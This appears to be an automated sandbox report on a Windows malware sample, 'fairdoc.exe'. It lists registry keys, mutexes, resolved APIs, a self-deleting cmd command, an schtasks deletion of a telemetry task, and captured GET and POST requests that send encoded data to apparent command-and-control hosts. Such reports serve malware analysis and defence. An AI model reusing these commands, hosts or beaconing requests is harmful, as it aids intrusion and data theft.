HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\systray.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxSessionSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\MaxEventSizePerSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\SamplingInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WMI\Autologger\SQMLogger\Start
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Flash Player Updater\Id
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance\Performance Refresh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ACPI\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NDIS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssmbios\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HDAudBus\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\intelppm\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\MofImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\monitor\ImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\advapi32.dll[MofResourceName]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\it-IT\advapi32.dll.mui[MofResourceName]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\drivers\ACPI.sys[ACPIMOFResource]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\drivers\it-IT\ACPI.sys.mui[ACPIMOFResource]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\DREDGE\C:\Windows\system32\drivers\ndis.sys[MofResourceName]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\KnownSvcs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Working Directory
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wmi
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wmi
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\AppId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\WMI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\WMI
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ProcessID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ThrottleDrege

Write Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\AdaptiveSqm\ManifestInfo\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastRunTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\WSqmConsLastEventTimeStamp

Delete Keys

Nothing to display

Mutexes

Local\_!MSFTHISTORY!_
Local\c:!users!seven01!appdata!local!microsoft!windows!temporary internet files!content.ie5!
Local\c:!users!seven01!appdata!roaming!microsoft!windows!cookies!
Local\c:!users!seven01!appdata!local!microsoft!windows!history!history.ie5!
Global\SQMWindowsConsolidator
Global\ADAP_WMI_ENTRY
Global\RefreshRA_Mutex
Global\RefreshRA_Mutex_Lib
Global\RefreshRA_Mutex_Flag

Resolved APIs

cryptbase.dll.SystemFunction036
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
mlang.dll.#112
wininet.dll.FindFirstUrlCacheEntryA
kernel32.dll.SetFileInformationByHandle
shell32.dll.SHGetFolderPathW
urlmon.dll.CreateUri
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.AcquireSRWLockShared
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.ReleaseSRWLockShared
wininet.dll.FindNextUrlCacheEntryA
wininet.dll.FindCloseUrlCache
oleaut32.dll.#500
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.#10
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
sspicli.dll.GetUserNameExW
pcwum.dll.PerfDeleteInstance
pcwum.dll.PerfStopProvider
cryptsp.dll.CryptReleaseContext
wbemcore.dll.Reinitialize
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.LocaleNameToLCID
kernel32.dll.GetLocaleInfoEx
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetSystemDefaultLocaleName
fastprox.dll.DllGetClassObject
fastprox.dll.DllCanUnloadNow
kernel32.dll.RegOpenKeyExW
psapi.dll.EnumProcesses
psapi.dll.EnumProcessModules
psapi.dll.GetModuleBaseNameW
ntdll.dll.NtQuerySystemInformation
user32.dll.GetLastInputInfo

Execute Commands

C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Seven01\AppData\Local\Temp\fairdoc.exe"
C:\Windows\system32\lsass.exe
C:\Windows\System32\wsqmcons.exe
C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"
\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R

Started Services

VaultSvc

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-11-13 00:04:33 2018-11-13 00:07:33 180

10 HTTP Request(s) detected

http://www.ohtgfd.men/hx312/?qR-LpBOP=koELi7gRf66ML+Q5UsimmntVjCMhL5KzkLyMM1fn8YrLn8smfh4PR1x+GryCV13HGylSYMNx&SVj0xL=yj94pdThzhv
  • Hostname: www.ohtgfd.men
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx312/?qR-LpBOP=koELi7gRf66ML+Q5UsimmntVjCMhL5KzkLyMM1fn8YrLn8smfh4PR1x+GryCV13HGylSYMNx&SVj0xL=yj94pdThzhv HTTP/1.1
Host: www.ohtgfd.men
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.pabwallet.com/hx312/?qR-LpBOP=XKh1BURqDBXsyccA/k0r0qTDTSoV0lkeie7qs+TU9Nt5Pkq2eKhIkNGwLiJ201k0OWTfqU7F&SVj0xL=yj94pdThzhv
  • Hostname: www.pabwallet.com
  • IP Address:
  • Port: 80
  • Count: 1

GET /hx312/?qR-LpBOP=XKh1BURqDBXsyccA/k0r0qTDTSoV0lkeie7qs+TU9Nt5Pkq2eKhIkNGwLiJ201k0OWTfqU7F&SVj0xL=yj94pdThzhv HTTP/1.1
Host: www.pabwallet.com
Connection: close

\x00\x00\x00\x00\x00\x00\x00

http://www.pabwallet.com/hx312/
  • Hostname: www.pabwallet.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.pabwallet.com
Connection: close
Content-Length: 2202
Cache-Control: no-cache
Origin: http://www.pabwallet.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.pabwallet.com/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

qR-LpBOP=fotPfzhwVyn7kLQn7ihNjuDkEQBA5Rscn4ado8jlwMN_GVexZPxdytz8AncZqm9UWVXgvjaxPIgoqw(jKTRSc-AVRAtkm9J39J3aM_MQpQZwufkI~C6-~QZ3~TbjQJ(dQQR72GFMs6KIFWGX0NUQ4McfJFB5yKfI~vi5LskovoYzCxnNHeZg(T4B7OKgCH17tq6yHXGHI7ie(yeJNU7Ig8WRlzOExWRHn5~8ZzBywonJ9h1wVQPA4uDZS4CfRm9i6ZlrIA5OP7xy~qIt2Dmwz3dHc1JbigJAiAhQj_l-sNEz(0WxB4mnzEbaiXRGFL8HFN2u28RKyixYuDsT0Qm3sy8QFvA8t5KIv9l1DZjE2J64AmKlE40BQqfn8vtSs2EcxSS7Ja84gQLDsKTw35xd3Yn3KfkI1SAHpKQRA65xex6lgzVFA_13L0jdGFj2mwQ7qMMJJ3zuWZMZsE5DofAIeF24L8uN0XLerdmUv8vlCqenJx6kfeJKZiyFN9G2cgjudr~2QQWs2IivKJ8ivEcLXIEFnbuEk1Q6VvrXRtFx22bq(zsrNRaSC3r74Wvz86Z-4yPcVkVsCs(pwWKCz1dojFFf0_4uqeEvFXKvO978F5HMiNO2AwJcgGgILBd2hnPdog31ZElQofgnyeNGswppziPQGFnPuFQjItmG303qsi9nHFc8hGc4eRPtVt(DXA9Iz9eIR_U0Afg8QHLblBcqWwPjFkQfld826qHCOuckKN6VzYVpKhU2JDBeMjpZtehiU1~fpTOOCokocYK9Epye1wFfAj4zERDDNSW60SllI13LLw23LKbR7u8llB~D(oCwgi2hrz~5SIXuTO(aRNpuDgasdex2XoIq9DzPwI28Ay~LaOv6c2(tnQl07-KAvFevJu0-ixhrp64t3794Zfwh7jexamKJQvbchWgsoCOMn1D7fDTif5i3WpBWWFrsxp5HPettIyxvn3rfn1v0Q5SEknAqQuPMUhIpe0lclaMM98mzgWlFGwV9xnoGIVxuicMV16RnL67l6KfIQoysH7yJ~He481UUbGmFFcDmOvgO1wyqTZse5xsMXvevP1hfxgjNQuvAu92R3liQw9UGFizUP6dZJNtiBi9HAY3ParHcg0Xt(FnovdRThnmA8CSqWnIn(6Se3DjX1tsq8OLkju6KpH3WQejWxPVAUlOR(Tzp1UpAF0opaUeKVuikmy6V5uU9EnYxYM4NLx~8yh3FLuRfRhD9cRCLLt32IYASa_JoVSdNfi~u3jUbHF5jUuL9AWKmxMPLoUfY8VISc6rXICyK9pdJ0gMOz7iELbQF00MEjZIopMWkQUAoHbm27exY6Zvc23AtwQ3aU-DdjaLIEPlnNKUMbC(7PblHktX_qZL5aW8n260rqta6Bc8W4IvXsc2B0jmq8Lxa5i7rUQ(tq9e1EqkZfRaOtKRjsDNgFdrAne1E7WCmKRo6hsZtpPiqNGJ4LtJRJUul18Esn2uLWFdZeU5Bxeji5L6Rpe8f2X4wp8fUBwwtd2zttphV1vdIK19jp7~WJGu17PUrOJoO22coW7xsh0iginL_MvTnDnmWS_3YSJxVtJnHHd0Oua5f0f7xy-i3MSInj6kMdMgN11xnjyS_A6AfmUtXFlhFPn(EENN_W_9YuIaJrbHbkr9hV0aWpQqqg8sJTaUSv_LmLSqW8Eh0OO0b8JcuArfQcXLbApoC8wqfv1xjNkw1DPauxkJnzj2XPFK9swp3hPmk6IyWyBSYsfc-ADS-D6qxzzFFvNwTrwin6JMAR7gQ6VklAJ~NYDDMEWHJnQmo~CMciVVZvkbsBFHe0Ejee8BdRqOnVTW186GMQ9kAZTg3s4oURnpR0Ra6eMZ1pYd_nd~UvreayyQU8zZ0isg0(IaqGARSs-QUBp1-gI3mfxmHgDAKUeH3Mr9ykWRA7VRY5Y~Tb4jDLPqVzLDYpqZlEd66zKx8teE4kvpExV7vZr(cRNMqOUFh~ml5akemRSxE50FnXYVXMs8SbYhS~96ymhyRbcA5BUJdq7pyORxIMX1q~EaSfzAwP_TUMm9X4t5HIOXh~bglawnjdrb3RCoI0lN1tqraNAKw8qDS2WMlgUeZTP0pqPRwbPlA2zjjh7kt(Kyqz-I5HLaQUmmKpMYhnoYgZ6HfdZ9WhxpItB1UeEXtl-ZEyZ99zTdc9o~g9Mth\x00\x00\x00\x00\x00\x00\x00\x00

http://www.pabwallet.com/hx312/
  • Hostname: www.pabwallet.com
  • IP Address:
  • Port: 80
  • Count: 1

POST /hx312/ HTTP/1.1
Host: www.pabwallet.com
Connection: close
Content-Length: 57170
Cache-Control: no-cache
Origin: http://www.pabwallet.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.pabwallet.com/hx312/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

qR-LpBOP=fotPfyYWUCjugJ4y(jxdmOf3RwVZ0mYJ75H8o8ThpZowC0uxbMZa6tz_CncYgGgpfkz4viuXPIo3iyHmCR5FSOElZgpHi-x0srKYdO0Q2zFyzcMfyT3x8wFi1yzqJOL8CFJ_xGl0o4aDACy_1rIc2dseCm9_zrSz5ujkOs90mJs5SxHFHbhVnCI4ztaQKUcGppWyA2utcoqcmVqRAnCwhNmrixWfu2xdrfCWEG4Rj5fd3RFMYQLLmOe_IKjHRXgi27BjMUxcOJ9-1f9S6Cy4wGttHGpboTRajC5u~Pldhu0v1UWFB7K_yzypu3REY_IuDte2tuZagDBYhA0-8zC8oC81G_Rk(ZG9v91pDp7ExNW4FGaiC40BJ6fp8vtas2ExxU23Ia04pxHBvYL6j85Xy4nzE-ko(ztgpJgZBeBxO16qwCFBIO0hfAeadVr9mwMm4ZpiE3~yEZNPkUNQsbcUT1GNT92-3nfnr9yRvaH5DrC7BR(GarxeVzDnaOzzYVr7ePWMBhKU0LyfK7lD(VofR5oQv8(RvlBoEr(qQ9xbjET-xzp9b0DNSmzIyAPLqrJzsRPhd09jPM7qmz6TwXg5yAoz0fkYi7o3PS~ULf7JBajhl_uuMAlv21Z5BDZ4nCPYghHJGy5zv95Pst9gzBNF9BngBF6_pBcGGsCtwXSKpAwXLxEeo3xXNhvbCfGoewl84-eZXcE5CNREAGfj5AkBXDfWZkAXlq4b6qfOO-QkY9eV3bNqKG41cDBcAzoIj-sHU2PAoTCOFecmNqiNA7uTtQFHPCEwARjUNUHt1Tp1MzzKO1izGqba7MpbnBywi4yagzCXgiSpC7ulWdXfaMNtHkuGf-Nkd99A1h3V(bCsIXCPHaXAPH3lqztp1aGlrRv1assiwysVncU69oktZ6NMyAKaRFzXQ5Polm5CpirdtkvpVnb2O5~vFLxrWxvCwNJbEMY1DT15vnf-m0zIU-apjy0JQO7uL0cgUjZGmtAL(tuejzBpe0cVuxsNJzoTk5gTsdhxJ6bWqJjXT6TZT5~h41im9lAfWiPeILHNdNg73mS9a7AI2FkwVOGZcHNipR77c-OEmvnUyAOxwMQ-Pmz4J49sKZokW1cKAZHlbJ7ctkft5VHo1Ipqs2bf(ziafUUQ65Wm0mPEy-Uz2uGgrsr3i0TsVuHl4sZZVl2Z6gzk1WJAGV0WRVzqWuC